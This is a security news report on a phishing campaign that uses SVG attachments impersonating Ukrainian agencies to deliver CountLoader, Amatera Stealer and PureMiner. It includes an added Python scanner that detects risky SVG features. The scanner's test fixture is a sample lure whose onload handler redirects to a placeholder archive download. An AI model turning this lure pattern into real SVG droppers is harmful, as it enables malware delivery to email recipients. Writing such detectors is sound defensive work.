A recently identified phishing campaign uses fraudulent emails that impersonate Ukrainian government agencies. The operation is designed to deliver CountLoader, a malware loader that in turn installs Amatera Stealer and PureMiner.
According to researchers from Fortinet FortiGuard Labs, these phishing emails contain malicious Scalable Vector Graphics (SVG) files, enticing recipients to open harmful attachments. The documented attack sequences highlight how SVG files trigger the download of a password-protected ZIP file, which contains a Compiled HTML Help (CHM) file. Once opened, this CHM file initiates a series of actions leading to the deployment of CountLoader, disguised as a notification from the National Police of Ukraine.
CountLoader has been noted for distributing various payloads, including Cobalt Strike and PureHVNC RAT among others. In this case, it serves to deliver Amatera Stealer, a variant of ACRStealer, alongside PureMiner, a stealthy cryptocurrency miner.
Amatera Stealer, upon execution, gathers system information, captures files based on specific extensions, and extracts data from Chromium and Gecko-based browsers as well as applications like Steam and Telegram. Fortinet stressed that the sophistication of this phishing campaign showcases how SVG files can be weaponized to launch malware infections.
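The SVG stage of the chain described above is the one a mail gateway can inspect statically before any ZIP or CHM is ever fetched. The following is an added example, not code from the article or from Fortinet: a small Python scanner that flags SVG attachments carrying scripts, event handlers, foreign objects, or hyperlinks to external or non-image resources, run over two constructed sample files (the URL in the lure sample is a placeholder).

```python
import re
import xml.etree.ElementTree as ET

XLINK_NS = "{http://www.w3.org/1999/xlink}"
# Elements a static image never needs but a redirecting lure commonly relies on
RISKY_TAGS = {"script", "foreignObject", "iframe"}
HREF_ATTRS = {"href", XLINK_NS + "href"}
EVENT_ATTR = re.compile(r"^on[a-z]+$", re.IGNORECASE)          # onload, onclick, ...
EXTERNAL_URL = re.compile(r"^(?:https?:|javascript:)", re.IGNORECASE)
DATA_URI = re.compile(r"^data:([^;,]*)", re.IGNORECASE)         # captures the media type

def _local(name):
    """Strip an XML namespace prefix: '{ns}tag' -> 'tag'."""
    return name.rsplit("}", 1)[-1]

def svg_findings(svg_bytes):
    """Return a sorted list of reasons an SVG attachment looks like a lure (empty = clean).
    Uses the stdlib parser; in production prefer defusedxml to resist entity-expansion bombs."""
    findings = set()
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError:
        return ["malformed-xml"]        # a file that will not parse is itself worth quarantining
    for el in root.iter():
        if _local(el.tag) in RISKY_TAGS:
            findings.add("element:" + _local(el.tag))
        for name, value in el.attrib.items():
            if EVENT_ATTR.match(_local(name)):
                findings.add("event-handler:" + _local(name).lower())
            if name in HREF_ATTRS:
                v = value.strip()
                if EXTERNAL_URL.match(v):
                    findings.add("href:" + v.split(":", 1)[0].lower())
                m = DATA_URI.match(v)
                if m and not m.group(1).lower().startswith("image/"):
                    findings.add("href:data-non-image")   # e.g. an embedded HTML/ZIP blob
    return sorted(findings)

def is_suspicious(svg_bytes):
    return bool(svg_findings(svg_bytes))

# Constructed samples: a plain icon and a lure that redirects to an archive download
BENIGN_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">'
              b'<rect width="10" height="10" fill="blue"/></svg>')
LURE_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" '
            b'onload="location.href=\'https://example.invalid/document.zip\'">'
            b'<a xlink:href="https://example.invalid/document.zip"><text y="20">Open document</text></a>'
            b'<script>/* redirect logic */</script></svg>')

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_SVG), ("lure", LURE_SVG)):
        print(label, svg_findings(doc))
```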
In a separate campaign, a Vietnamese-speaking threat actor is using emails with copyright-infringement themes to lure recipients into downloading ZIP archives that ultimately deploy PXA Stealer. Security researcher James Northey commented on the evolution of these attacks, noting the increasing complexity and professionalism of the malware being deployed, which suggests a serious, maturing threat actor on the rise.
The continuous development of these tactics illustrates a pressing need for elevated awareness and proactive defenses against such sophisticated cyber threats.